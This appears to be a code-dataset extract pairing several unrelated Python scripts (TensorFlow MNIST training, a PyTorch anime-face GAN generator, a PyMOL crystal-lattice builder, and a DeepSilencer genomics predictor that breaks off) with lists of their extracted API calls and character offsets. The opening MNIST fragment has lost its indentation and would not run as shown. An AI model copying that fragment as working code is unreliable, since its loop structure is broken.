y_test = tf.placeholder(tf.float32, shape=[None, 10])
test_is_training = tf.placeholder(tf.bool)
logits_test, end_points_test = mnist_net.net(x_test, is_training = test_is_training, reuse = True)
correct_prediction_test = tf.equal(tf.argmax(end_points_test['Predictions'], 1), tf.argmax(y_test, 1))
#accuracy_test = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
num_correct = tf.reduce_sum(tf.cast(correct_prediction_test, tf.float32))
assignment = embedding.assign(end_points_test['Features'])
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(iteration):
batch = mnist.train.next_batch(mnist_net.batch_size)
_,summary_str = sess.run([train_step,summary_op], feed_dict={is_training : True})
#_,summary_str = sess.run([train_step,summary_op], feed_dict={x: np.reshape(batch[0], (-1, 28, 28, 1)), y_:batch[1], is_training : True})
if i %100 == 0:
global_step_str = global_step.eval()
train_writer.add_summary(summary_str, global_step_str)
#print('%diteration'%global_step_str,sess.run(accuracy, feed_dict={is_training : True}))
print('####################################')
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
if i % 1000 == 0:
sum_accuracy_test = 0.0
test_batch_x = mnist.test.images[:10000] * 2.0 - 1
test_batch_y = mnist.test.labels[:10000]
accuracy_test_str, _ = sess.run([num_correct, assignment],
feed_dict={x_test: np.reshape(test_batch_x, (-1, 28, 28, 1)), y_test: test_batch_y, test_is_training: False})
sum_accuracy_test += accuracy_test_str
print ("test accuracy is: %f" % (sum_accuracy_test /10000.0 ))
saver.save(sess, "./checkpoint_pretrain/",global_step=global_step_str)
coord.request_stop()
coord.join(threads)
time.sleep(3)
if __name__ == '__main__':
tf.app.run()
| [
"tensorflow.train.Coordinator",
"tensorflow.trainable_variables",
"tensorflow.get_collection",
"tensorflow.logging.set_verbosity",
"tensorflow.local_variables_initializer",
"tensorflow.InteractiveSession",
"tensorflow.contrib.tensorboard.plugins.projector.visualize_embeddings",
"os.path.dirname",
"t... | [((300, 342), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.DEBUG'], {}), '(tf.logging.DEBUG)\n', (324, 342), True, 'import tensorflow as tf\n'), ((5188, 5200), 'tensorflow.app.run', 'tf.app.run', ([], {}), '()\n', (5198, 5200), True, 'import tensorflow as tf\n'), ((451, 504), 'tensorflow.examples.tutorials.mnist.input_data.read_data_sets', 'input_data.read_data_sets', (['"""MNIST_data"""'], {'one_hot': '(True)'}), "('MNIST_data', one_hot=True)\n", (476, 504), False, 'from tensorflow.examples.tutorials.mnist import input_data\n'), ((527, 550), 'tensorflow.placeholder', 'tf.placeholder', (['tf.bool'], {}), '(tf.bool)\n', (541, 550), True, 'import tensorflow as tf\n'), ((666, 689), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {}), '()\n', (687, 689), True, 'import tensorflow as tf\n'), ((827, 849), 'MNIST_Classification_with_embedding.Classification_Model', 'Classification_Model', ([], {}), '()\n', (847, 849), False, 'from MNIST_Classification_with_embedding import Classification_Model\n'), ((1282, 1324), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.UPDATE_OPS'], {}), '(tf.GraphKeys.UPDATE_OPS)\n', (1299, 1324), True, 'import tensorflow as tf\n'), ((1807, 1831), 'tensorflow.trainable_variables', 'tf.trainable_variables', ([], {}), '()\n', (1829, 1831), True, 'import tensorflow as tf\n'), ((1932, 1991), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['"""./checkpoint_pretrain/"""', 'sess.graph'], {}), "('./checkpoint_pretrain/', sess.graph)\n", (1953, 1991), True, 'import tensorflow as tf\n'), ((2046, 2098), 'tensorflow.contrib.tensorboard.plugins.projector.visualize_embeddings', 'projector.visualize_embeddings', (['train_writer', 'config'], {}), '(train_writer, config)\n', (2076, 2098), False, 'from tensorflow.contrib.tensorboard.plugins import projector\n'), ((2673, 2781), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {'max_to_keep': '(5)', 'keep_checkpoint_every_n_hours': '(1.0)', 'write_version': '(2)', 'pad_step_number': '(False)'}), '(max_to_keep=5, keep_checkpoint_every_n_hours=1.0,\n write_version=2, pad_step_number=False)\n', (2687, 2781), True, 'import tensorflow as tf\n'), ((2998, 3049), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, 28, 28, 1]'}), '(tf.float32, shape=[None, 28, 28, 1])\n', (3012, 3049), True, 'import tensorflow as tf\n'), ((3067, 3111), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, 10]'}), '(tf.float32, shape=[None, 10])\n', (3081, 3111), True, 'import tensorflow as tf\n'), ((3139, 3162), 'tensorflow.placeholder', 'tf.placeholder', (['tf.bool'], {}), '(tf.bool)\n', (3153, 3162), True, 'import tensorflow as tf\n'), ((3629, 3651), 'tensorflow.train.Coordinator', 'tf.train.Coordinator', ([], {}), '()\n', (3649, 3651), True, 'import tensorflow as tf\n'), ((3670, 3711), 'tensorflow.train.start_queue_runners', 'tf.train.start_queue_runners', ([], {'coord': 'coord'}), '(coord=coord)\n', (3698, 3711), True, 'import tensorflow as tf\n'), ((5142, 5155), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (5152, 5155), False, 'import time\n'), ((597, 648), 'os.path.dirname', 'os.path.dirname', (['"""./checkpoint_pretrain/checkpoint"""'], {}), "('./checkpoint_pretrain/checkpoint')\n", (612, 648), False, 'import os\n'), ((763, 804), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.SUMMARIES'], {}), '(tf.GraphKeys.SUMMARIES)\n', (780, 804), True, 'import tensorflow as tf\n'), ((1338, 1379), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['extra_update_ops'], {}), '(extra_update_ops)\n', (1361, 1379), True, 'import tensorflow as tf\n'), ((1747, 1780), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'losses'], {}), "('loss', losses)\n", (1764, 1780), True, 'import tensorflow as tf\n'), ((2138, 2177), 'tensorflow.argmax', 'tf.argmax', (["end_points['Predictions']", '(1)'], {}), "(end_points['Predictions'], 1)\n", (2147, 2177), True, 'import tensorflow as tf\n'), ((2179, 2195), 'tensorflow.argmax', 'tf.argmax', (['y_', '(1)'], {}), '(y_, 1)\n', (2188, 2195), True, 'import tensorflow as tf\n'), ((2239, 2278), 'tensorflow.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (2246, 2278), True, 'import tensorflow as tf\n'), ((2438, 2477), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""accuracy"""', 'accuracy'], {}), "('accuracy', accuracy)\n", (2455, 2477), True, 'import tensorflow as tf\n'), ((2571, 2604), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (2602, 2604), True, 'import tensorflow as tf\n'), ((2623, 2655), 'tensorflow.local_variables_initializer', 'tf.local_variables_initializer', ([], {}), '()\n', (2653, 2655), True, 'import tensorflow as tf\n'), ((3313, 3357), 'tensorflow.argmax', 'tf.argmax', (["end_points_test['Predictions']", '(1)'], {}), "(end_points_test['Predictions'], 1)\n", (3322, 3357), True, 'import tensorflow as tf\n'), ((3359, 3379), 'tensorflow.argmax', 'tf.argmax', (['y_test', '(1)'], {}), '(y_test, 1)\n', (3368, 3379), True, 'import tensorflow as tf\n'), ((3498, 3542), 'tensorflow.cast', 'tf.cast', (['correct_prediction_test', 'tf.float32'], {}), '(correct_prediction_test, tf.float32)\n', (3505, 3542), True, 'import tensorflow as tf\n'), ((409, 419), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (417, 419), True, 'import tensorflow as tf\n'), ((1700, 1722), 'tensorflow.cast', 'tf.cast', (['x', 'tf.float32'], {}), '(x, tf.float32)\n', (1707, 1722), True, 'import tensorflow as tf\n'), ((1859, 1907), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['variable.op.name', 'variable'], {}), '(variable.op.name, variable)\n', (1879, 1907), True, 'import tensorflow as tf\n'), ((4405, 4453), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.GLOBAL_VARIABLES'], {}), '(tf.GraphKeys.GLOBAL_VARIABLES)\n', (4422, 4453), True, 'import tensorflow as tf\n'), ((4763, 4804), 'numpy.reshape', 'np.reshape', (['test_batch_x', '(-1, 28, 28, 1)'], {}), '(test_batch_x, (-1, 28, 28, 1))\n', (4773, 4804), True, 'import numpy as np\n')] |
import torch
import numpy as np
import os
import argparse
from PIL import Image
from tools import display_images_in_folder
parser = argparse.ArgumentParser('Generated Anime Faces')
parser.add_argument('--num_images', type=int, default=64, help='number of generated images')
args = parser.parse_args()
if __name__ == "__main__":
generated_image_folder = './result'
os.makedirs(generated_image_folder, exist_ok=True)
G = torch.load('./model/Generator.pt')
num_images = args.num_images
fixed_z = torch.from_numpy(np.random.uniform(-1, 1, size=(num_images, 100))).float()
if torch.cuda.is_available():
fixed_z = fixed_z.cuda()
G.cuda()
images = G(fixed_z)
images = images.to('cpu').detach().numpy().copy()
images = np.transpose(images, (0, 2, 3, 1))
images = (images * 255).astype(np.uint8)
for idx, image in enumerate(images):
file_name = os.path.join(generated_image_folder, '{}.jpg'.format(idx + 1))
Image.fromarray(image).save(file_name)
display_images_in_folder(generated_image_folder, os.path.join(generated_image_folder, 'combined.jpg'))
| [
"numpy.random.uniform",
"os.makedirs",
"argparse.ArgumentParser",
"torch.load",
"numpy.transpose",
"torch.cuda.is_available",
"PIL.Image.fromarray",
"os.path.join"
] | [((133, 181), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Generated Anime Faces"""'], {}), "('Generated Anime Faces')\n", (156, 181), False, 'import argparse\n'), ((374, 424), 'os.makedirs', 'os.makedirs', (['generated_image_folder'], {'exist_ok': '(True)'}), '(generated_image_folder, exist_ok=True)\n', (385, 424), False, 'import os\n'), ((433, 467), 'torch.load', 'torch.load', (['"""./model/Generator.pt"""'], {}), "('./model/Generator.pt')\n", (443, 467), False, 'import torch\n'), ((598, 623), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (621, 623), False, 'import torch\n'), ((766, 800), 'numpy.transpose', 'np.transpose', (['images', '(0, 2, 3, 1)'], {}), '(images, (0, 2, 3, 1))\n', (778, 800), True, 'import numpy as np\n'), ((1071, 1123), 'os.path.join', 'os.path.join', (['generated_image_folder', '"""combined.jpg"""'], {}), "(generated_image_folder, 'combined.jpg')\n", (1083, 1123), False, 'import os\n'), ((533, 581), 'numpy.random.uniform', 'np.random.uniform', (['(-1)', '(1)'], {'size': '(num_images, 100)'}), '(-1, 1, size=(num_images, 100))\n', (550, 581), True, 'import numpy as np\n'), ((979, 1001), 'PIL.Image.fromarray', 'Image.fromarray', (['image'], {}), '(image)\n', (994, 1001), False, 'from PIL import Image\n')] |
#!/usr/bin/env python
import argparse
import numpy as np
from scipy.spatial import distance
import string
import __main__
import xtalmd
from xtalmd.utils import cellbasis
parser = argparse.ArgumentParser(description="Generate crystal lattices by using some reference crystal lattice.\
Written by <NAME>, <NAME>, <EMAIL>")
parser.add_argument('--input', '-i', type=str,\
help='Input PDB file',\
required=True,\
nargs='+')
parser.add_argument('--reference', '-r', type=str,\
help='Reference PDB file. Used for construction of crystal lattice',\
required=True)
parser.add_argument('--lattice_factors_x', '-lx',type=int,\
help='Repeat unit cell in x direction from a to b',\
default=[-1,1],\
nargs=2)
parser.add_argument('--lattice_factors_y', '-ly',type=int,\
help='Repeat unit cell in y direction from a to b',\
default=[-1,1],\
nargs=2)
parser.add_argument('--lattice_factors_z', '-lz',type=int,\
help='Repeat unit cell in z direction from a to b',\
default=[-1,1],\
nargs=2)
parser.add_argument('--duplicate_cutoff', '-dc',type=float,\
help='If any atom between any two molecules are closer than this, one of them molecules be removed.',\
default=1e-5,\
nargs=1)
parser.add_argument('--output', '-o', type=str,\
help='Output filename',\
default='lattice.pdb')
parser.add_argument('--verbose', '-v', type=int,\
help='Verbosity mode',\
default=0)
def symexpcell(
prefix='mate',
pymol_object=None,
reference=None,
duplicate_cutoff=1e-5,
a=0,
b=0,
c=0):
'''
DESCRIPTION
Adapted from supercell.py: https://pymolwiki.org/index.php/Supercell
Creates all symmetry-related objects for the specified object that
occur with their bounding box center within the unit cell.
USAGE
symexpcell prefix, object, [a, b, c]
ARGUMENTS
prefix = string: prefix of new objects
pymol_object = string: pymol object for which to create symmetry mates
a, b, c = integer: create neighboring cell {default: 0,0,0}
SEE ALSO
symexp, http://www.pymolwiki.org/index.php/SuperSym
'''
if pymol_object == None:
pymol_object = pymol.cmd.get_object_list()[0]
if reference == None:
reference = pymol_object
sym = pymol.cmd.get_symmetry(reference)
cell_edges = sym[0:3]
cell_angles = sym[3:6]
spacegroup = sym[6]
basis = cellbasis(cell_angles, cell_edges)
basis = np.matrix(basis)
extent = pymol.cmd.get_extent(reference)
center = sum(np.array(extent)) * 0.5
center = np.matrix(center.tolist() + [1.0]).T
center_cell = basis.I * center
extra_shift = [[float(i)] for i in (a,b,c)]
matrices = pymol.xray.sg_sym_to_mat_list(spacegroup)
global_names = pymol.cmd.get_object_list("global")
N_global = len(global_names)
N_matrices = len(matrices)
crds_list_mates = np.zeros(
(N_matrices,
pymol.cmd.count_atoms(pymol_object),
3
)
)
crds_list_global = np.zeros(
(N_global,
pymol.cmd.count_atoms(pymol_object),
3
)
)
for mat_i in range(N_matrices):
mat = np.matrix(matrices[mat_i])
shift = np.floor(mat * center_cell)
mat[0:3,3] -= shift[0:3,0]
mat[0:3,3] += extra_shift
mat = basis * mat * basis.I
mat_list = list(mat.flat)
name = '%s%d' % (prefix, mat_i)
pymol.cmd.create(name, pymol_object)
pymol.cmd.transform_object(name, mat_list, 0)
crds_list_mates[mat_i] = pymol.cmd.get_coords(name, 1)
for global_i in range(N_global):
crds_list_global[global_i] = pymol.cmd.get_coords(global_names[global_i], 1)
excluded_objects = []
for mat_i in range(N_matrices):
if mat_i in excluded_objects:
continue
### Compute distance between molecule generated through
### matrix `mat_i` and all other molecules
for j in range(N_matrices):
if mat_i == j:
continue
dists_mates = distance.cdist(
crds_list_mates[j],
crds_list_mates[mat_i],
)
too_close_list_mates = np.where(dists_mates < duplicate_cutoff)[0]
if too_close_list_mates.size > 0:
excluded_objects.append(j)
for j in range(N_global):
dists_global = distance.cdist(
crds_list_global[j],
crds_list_mates[mat_i],
)
too_close_list_global = np.where(dists_global < duplicate_cutoff)[0]
if too_close_list_global.size > 0:
excluded_objects.append(mat_i)
break
unique_objects = list()
for mat_i in range(N_matrices):
if not mat_i in excluded_objects:
unique_objects.append('%s%d' % (prefix, mat_i))
else:
pymol.cmd.delete('%s%d' % (prefix, mat_i))
return unique_objects
if __name__ == "__main__":
args = parser.parse_args()
verbose = False
if args.verbose > 0:
verbose = True
if verbose:
__main__.pymol_argv = ['pymol','-qc'] # Pymol: quiet and no GUI
else:
__main__.pymol_argv = ['pymol','-qQc'] # Pymol: quiet and no GUI
import pymol
pymol.finish_launching()
pymol.cmd.set("pdb_conect_all", "on")
pymol.cmd.set("connect_mode", "1")
pymol.cmd.set("retain_order", "1")
pymol.cmd.set('pdb_use_ter_records', 1)
pymol.cmd.group("global")
pymol.cmd.load(args.reference, "reference")
object_count = 0
uc_count = 0
for input_idx, input in enumerate(args.input):
if verbose:
print("Loading %s..." %input)
pymol.cmd.load(input, "input")
### Build the P1 cell
p1_object_list = symexpcell(
"p1_cell",
"input",
"reference",
args.duplicate_cutoff,
0,
0,
0)
crds_list = list()
N_p1_obj = len(p1_object_list)
remove_atoms = list()
for object_name in p1_object_list:
crds_list.append(pymol.cmd.get_coords(object_name, 1))
crds_list = np.array(crds_list)
for object_idx_1 in range(N_p1_obj):
for object_idx_2 in range(N_p1_obj):
p1_dists = distance.cdist(
crds_list[object_idx_1],
crds_list[object_idx_2]
)
valids_1, valids_2 = np.where(p1_dists < args.duplicate_cutoff)
for i in range(valids_1.size):
if valids_1[i] == valids_2[i]:
continue
valids1_str = f"{p1_object_list[object_idx_1]} and rank {valids_1[i]:d}"
valids2_str = f"{p1_object_list[object_idx_2]} and rank {valids_2[i]:d}"
if not valids2_str in remove_atoms:
if not valids1_str in remove_atoms:
remove_atoms.append(valids1_str)
for ra in remove_atoms:
pymol.cmd.remove(ra)
create_list = list()
for object_name in p1_object_list:
if pymol.cmd.count_atoms(object_name) == 0:
pymol.cmd.delete(object_name)
else:
create_list.append(object_name)
pymol.cmd.create("input_p1", " or ".join(create_list))
for object_name in create_list:
pymol.cmd.delete(object_name)
a, b, c, alpha, beta, gamma, spacegroup = pymol.cmd.get_symmetry("input")
pymol.cmd.set_symmetry(
"input_p1",
a,
b,
c,
alpha,
beta,
gamma,
"P1")
pymol.cmd.delete(f"input")
for a in range(args.lattice_factors_x[0],args.lattice_factors_x[1]+1):
for b in range(args.lattice_factors_y[0],args.lattice_factors_y[1]+1):
for c in range(args.lattice_factors_z[0],args.lattice_factors_z[1]+1):
if verbose:
print("Generating unit cell",a,b,c)
object_list = symexpcell(
"i_",
"input_p1",
"input_p1",
args.duplicate_cutoff,
a,
b,
c)
for i in range(len(object_list)):
chain = string.ascii_uppercase[i]
chain = string.ascii_uppercase[i]
pymol.cmd.copy("mol%d" %object_count, object_list[i])
pymol.cmd.alter("mol%d" %object_count, 'chain="%s"' %chain)
pymol.cmd.group("global", "mol%d" %object_count)
if verbose:
pymol.cmd.save("mol%d_%d%d%d_%d_" %(input_idx,a,b,c,i) + args.output, "mol%d" %object_count)
pymol.cmd.delete(object_list[i])
object_count += 1
uc_count += 1
pymol.cmd.delete("input_p1")
pymol.cmd.save(args.output, "global")
| [
"argparse.ArgumentParser",
"pymol.cmd.copy",
"pymol.cmd.remove",
"numpy.floor",
"pymol.cmd.save",
"pymol.cmd.get_object_list",
"pymol.finish_launching",
"pymol.cmd.transform_object",
"pymol.cmd.delete",
"pymol.cmd.get_extent",
"scipy.spatial.distance.cdist",
"pymol.cmd.alter",
"pymol.cmd.cre... | [((182, 377), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate crystal lattices by using some reference crystal lattice. Written by <NAME>, <NAME>, <EMAIL>"""'}), "(description=\n 'Generate crystal lattices by using some reference crystal lattice. Written by <NAME>, <NAME>, <EMAIL>'\n )\n", (205, 377), False, 'import argparse\n'), ((3305, 3338), 'pymol.cmd.get_symmetry', 'pymol.cmd.get_symmetry', (['reference'], {}), '(reference)\n', (3327, 3338), False, 'import pymol\n'), ((3431, 3465), 'xtalmd.utils.cellbasis', 'cellbasis', (['cell_angles', 'cell_edges'], {}), '(cell_angles, cell_edges)\n', (3440, 3465), False, 'from xtalmd.utils import cellbasis\n'), ((3478, 3494), 'numpy.matrix', 'np.matrix', (['basis'], {}), '(basis)\n', (3487, 3494), True, 'import numpy as np\n'), ((3509, 3540), 'pymol.cmd.get_extent', 'pymol.cmd.get_extent', (['reference'], {}), '(reference)\n', (3529, 3540), False, 'import pymol\n'), ((3736, 3777), 'pymol.xray.sg_sym_to_mat_list', 'pymol.xray.sg_sym_to_mat_list', (['spacegroup'], {}), '(spacegroup)\n', (3765, 3777), False, 'import pymol\n'), ((3797, 3832), 'pymol.cmd.get_object_list', 'pymol.cmd.get_object_list', (['"""global"""'], {}), "('global')\n", (3822, 3832), False, 'import pymol\n'), ((6363, 6387), 'pymol.finish_launching', 'pymol.finish_launching', ([], {}), '()\n', (6385, 6387), False, 'import pymol\n'), ((6393, 6430), 'pymol.cmd.set', 'pymol.cmd.set', (['"""pdb_conect_all"""', '"""on"""'], {}), "('pdb_conect_all', 'on')\n", (6406, 6430), False, 'import pymol\n'), ((6435, 6469), 'pymol.cmd.set', 'pymol.cmd.set', (['"""connect_mode"""', '"""1"""'], {}), "('connect_mode', '1')\n", (6448, 6469), False, 'import pymol\n'), ((6474, 6508), 'pymol.cmd.set', 'pymol.cmd.set', (['"""retain_order"""', '"""1"""'], {}), "('retain_order', '1')\n", (6487, 6508), False, 'import pymol\n'), ((6513, 6552), 'pymol.cmd.set', 'pymol.cmd.set', (['"""pdb_use_ter_records"""', '(1)'], {}), "('pdb_use_ter_records', 1)\n", (6526, 6552), False, 'import pymol\n'), ((6557, 6582), 'pymol.cmd.group', 'pymol.cmd.group', (['"""global"""'], {}), "('global')\n", (6572, 6582), False, 'import pymol\n'), ((6588, 6631), 'pymol.cmd.load', 'pymol.cmd.load', (['args.reference', '"""reference"""'], {}), "(args.reference, 'reference')\n", (6602, 6631), False, 'import pymol\n'), ((10220, 10257), 'pymol.cmd.save', 'pymol.cmd.save', (['args.output', '"""global"""'], {}), "(args.output, 'global')\n", (10234, 10257), False, 'import pymol\n'), ((4216, 4242), 'numpy.matrix', 'np.matrix', (['matrices[mat_i]'], {}), '(matrices[mat_i])\n', (4225, 4242), True, 'import numpy as np\n'), ((4259, 4286), 'numpy.floor', 'np.floor', (['(mat * center_cell)'], {}), '(mat * center_cell)\n', (4267, 4286), True, 'import numpy as np\n'), ((4476, 4512), 'pymol.cmd.create', 'pymol.cmd.create', (['name', 'pymol_object'], {}), '(name, pymol_object)\n', (4492, 4512), False, 'import pymol\n'), ((4521, 4566), 'pymol.cmd.transform_object', 'pymol.cmd.transform_object', (['name', 'mat_list', '(0)'], {}), '(name, mat_list, 0)\n', (4547, 4566), False, 'import pymol\n'), ((4600, 4629), 'pymol.cmd.get_coords', 'pymol.cmd.get_coords', (['name', '(1)'], {}), '(name, 1)\n', (4620, 4629), False, 'import pymol\n'), ((4705, 4752), 'pymol.cmd.get_coords', 'pymol.cmd.get_coords', (['global_names[global_i]', '(1)'], {}), '(global_names[global_i], 1)\n', (4725, 4752), False, 'import pymol\n'), ((6796, 6826), 'pymol.cmd.load', 'pymol.cmd.load', (['input', '"""input"""'], {}), "(input, 'input')\n", (6810, 6826), False, 'import pymol\n'), ((7279, 7298), 'numpy.array', 'np.array', (['crds_list'], {}), '(crds_list)\n', (7287, 7298), True, 'import numpy as np\n'), ((8621, 8652), 'pymol.cmd.get_symmetry', 'pymol.cmd.get_symmetry', (['"""input"""'], {}), "('input')\n", (8643, 8652), False, 'import pymol\n'), ((8661, 8730), 'pymol.cmd.set_symmetry', 'pymol.cmd.set_symmetry', (['"""input_p1"""', 'a', 'b', 'c', 'alpha', 'beta', 'gamma', '"""P1"""'], {}), "('input_p1', a, b, c, alpha, beta, gamma, 'P1')\n", (8683, 8730), False, 'import pymol\n'), ((8837, 8863), 'pymol.cmd.delete', 'pymol.cmd.delete', (['f"""input"""'], {}), "(f'input')\n", (8853, 8863), False, 'import pymol\n'), ((10186, 10214), 'pymol.cmd.delete', 'pymol.cmd.delete', (['"""input_p1"""'], {}), "('input_p1')\n", (10202, 10214), False, 'import pymol\n'), ((3204, 3231), 'pymol.cmd.get_object_list', 'pymol.cmd.get_object_list', ([], {}), '()\n', (3229, 3231), False, 'import pymol\n'), ((3558, 3574), 'numpy.array', 'np.array', (['extent'], {}), '(extent)\n', (3566, 3574), True, 'import numpy as np\n'), ((3965, 4000), 'pymol.cmd.count_atoms', 'pymol.cmd.count_atoms', (['pymol_object'], {}), '(pymol_object)\n', (3986, 4000), False, 'import pymol\n'), ((4095, 4130), 'pymol.cmd.count_atoms', 'pymol.cmd.count_atoms', (['pymol_object'], {}), '(pymol_object)\n', (4116, 4130), False, 'import pymol\n'), ((5104, 5162), 'scipy.spatial.distance.cdist', 'distance.cdist', (['crds_list_mates[j]', 'crds_list_mates[mat_i]'], {}), '(crds_list_mates[j], crds_list_mates[mat_i])\n', (5118, 5162), False, 'from scipy.spatial import distance\n'), ((5456, 5515), 'scipy.spatial.distance.cdist', 'distance.cdist', (['crds_list_global[j]', 'crds_list_mates[mat_i]'], {}), '(crds_list_global[j], crds_list_mates[mat_i])\n', (5470, 5515), False, 'from scipy.spatial import distance\n'), ((5969, 6011), 'pymol.cmd.delete', 'pymol.cmd.delete', (["('%s%d' % (prefix, mat_i))"], {}), "('%s%d' % (prefix, mat_i))\n", (5985, 6011), False, 'import pymol\n'), ((8165, 8185), 'pymol.cmd.remove', 'pymol.cmd.remove', (['ra'], {}), '(ra)\n', (8181, 8185), False, 'import pymol\n'), ((8541, 8570), 'pymol.cmd.delete', 'pymol.cmd.delete', (['object_name'], {}), '(object_name)\n', (8557, 8570), False, 'import pymol\n'), ((5262, 5302), 'numpy.where', 'np.where', (['(dists_mates < duplicate_cutoff)'], {}), '(dists_mates < duplicate_cutoff)\n', (5270, 5302), True, 'import numpy as np\n'), ((5615, 5656), 'numpy.where', 'np.where', (['(dists_global < duplicate_cutoff)'], {}), '(dists_global < duplicate_cutoff)\n', (5623, 5656), True, 'import numpy as np\n'), ((7221, 7257), 'pymol.cmd.get_coords', 'pymol.cmd.get_coords', (['object_name', '(1)'], {}), '(object_name, 1)\n', (7241, 7257), False, 'import pymol\n'), ((7420, 7484), 'scipy.spatial.distance.cdist', 'distance.cdist', (['crds_list[object_idx_1]', 'crds_list[object_idx_2]'], {}), '(crds_list[object_idx_1], crds_list[object_idx_2])\n', (7434, 7484), False, 'from scipy.spatial import distance\n'), ((7584, 7626), 'numpy.where', 'np.where', (['(p1_dists < args.duplicate_cutoff)'], {}), '(p1_dists < args.duplicate_cutoff)\n', (7592, 7626), True, 'import numpy as np\n'), ((8273, 8307), 'pymol.cmd.count_atoms', 'pymol.cmd.count_atoms', (['object_name'], {}), '(object_name)\n', (8294, 8307), False, 'import pymol\n'), ((8330, 8359), 'pymol.cmd.delete', 'pymol.cmd.delete', (['object_name'], {}), '(object_name)\n', (8346, 8359), False, 'import pymol\n'), ((9677, 9731), 'pymol.cmd.copy', 'pymol.cmd.copy', (["('mol%d' % object_count)", 'object_list[i]'], {}), "('mol%d' % object_count, object_list[i])\n", (9691, 9731), False, 'import pymol\n'), ((9755, 9816), 'pymol.cmd.alter', 'pymol.cmd.alter', (["('mol%d' % object_count)", '(\'chain="%s"\' % chain)'], {}), '(\'mol%d\' % object_count, \'chain="%s"\' % chain)\n', (9770, 9816), False, 'import pymol\n'), ((9839, 9888), 'pymol.cmd.group', 'pymol.cmd.group', (['"""global"""', "('mol%d' % object_count)"], {}), "('global', 'mol%d' % object_count)\n", (9854, 9888), False, 'import pymol\n'), ((10069, 10101), 'pymol.cmd.delete', 'pymol.cmd.delete', (['object_list[i]'], {}), '(object_list[i])\n', (10085, 10101), False, 'import pymol\n'), ((9952, 10055), 'pymol.cmd.save', 'pymol.cmd.save', (["('mol%d_%d%d%d_%d_' % (input_idx, a, b, c, i) + args.output)", "('mol%d' % object_count)"], {}), "('mol%d_%d%d%d_%d_' % (input_idx, a, b, c, i) + args.output, \n 'mol%d' % object_count)\n", (9966, 10055), False, 'import pymol\n')] |
import tensorflow as tf
import os
import keras.backend as K
import hickle as hkl
import numpy as np
import argparse
from DeepSilencer import DeepSilencer
from sklearn.utils import shuffle
from Loading_data import seq_to_kspec,checkseq,chunks,loadindex,load_genome,num2acgt,acgt2num,seq2mat,encoding_matrix
from openpyxl import load_workbook
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='DeepSilencer: Newly developed deep learning model to predict silencers')
parser.add_argument('--data', '-d', type=str, help='input test data name',default='m_mm19_ENCODE')
parser.add_argument('--outdir', '-o', type=str, default=os.path.dirname(os.getcwd())+'/output/crossdata-projection-mouse/', help='Output path')
parser.add_argument('--model_name', '-f', type=str, default='./model/kmer_seq.h5', help='Model name to load for prediction')
parser.add_argument('--mapping_file','-m',type=str,default='Mouse_mapping.xlsx',help='Mapping the cell lines we predict to their real names')
parser.add_argument('--seed', type=int, default=1234, help='Random seed for repeat results')
parser.add_argument('--save_result','-p', type = bool, default = True, help='Save test labels and predicted labels')
parser.add_argument('--genome','-ge', type = str, default = 'mm10', help='The genome we need to predict')
parser.add_argument('--start_position','-sta', type = int, default = 0, help='Start position in the data to predict')
parser.add_argument('--end_position','-end', type = int, default = 0, help='End position in the data to predict. If set to 0, it will predict the entire test set')
args = parser.parse_args()
modelname = args.model_name
sequences = load_genome(args.genome)
indexes_encode = loadindex(sequences,name = args.data)
data_name = args.data
start_position = args.start_position
end_position = args.end_position
outdir = args.outdir
mapping = args.mapping_file
# load model
deepsilencer = DeepSilencer()
deepsilencer.load_weights(modelname)
pred_result = []
# predict the probability
if end_position == 0 and start_position == 0:
end_position = len(indexes_encode)
for i in range(start_position,end_position):
temp_sequence = indexes_encode[i]
silencers = list()
index = temp_sequence
target_length = 200
stride = 1
# The sliding window
try:
[sampleid, chrkey, startpos, endpos, _] = index
except:
[sampleid, chrkey, startpos, endpos] = index
origin_length = endpos - startpos
if origin_length < target_length:
silencer_start = startpos - target_length + origin_length
silencer_end = endpos + target_length -origin_length
for shift in range(0, target_length - origin_length, stride):
start = startpos - shift
end = start + target_length
seq, legal = checkseq(chrkey, start, end,sequences)
if legal:
silencers.append([sampleid, chrkey, start, end])
elif origin_length >= target_length:
silencer_start = startpos + target_length - origin_length
silencer_end = endpos - target_length + origin_length
chunks_ = chunks(range(startpos, endpos), target_length, target_length - stride)
for chunk in chunks_:
start = chunk[0]
end = chunk[-1] + 1
if (end - start) == target_length:
seq, legal = checkseq(chrkey, start, end,sequences)
silencers.append([sampleid, chrkey, start, end])
elif (end - start) < target_length:
break
num = len(silencers)
silencer_mat = np.vstack([seq2mat(sequences[item[1]][item[2]:item[3]]) for item \
in silencers])
silencer_mat = silencer_mat.astype(int)
silencer_mat = silencer_mat.reshape(-1,4,200,1)
silencer_seq = sequences[chrkey][silencer_start+1:silencer_end+1]
test_data_kmer = []
K = 5
seq = silencer_seq[-201:-1]
kmer_whole = seq_to_kspec(seq,K=K)
kmer_whole = np.array(kmer_whole).reshape(4**K)
kmer = np.copy(kmer_whole)
test_data_kmer.append(kmer)
for ind in range(num-1):
kmer = np.copy(kmer)
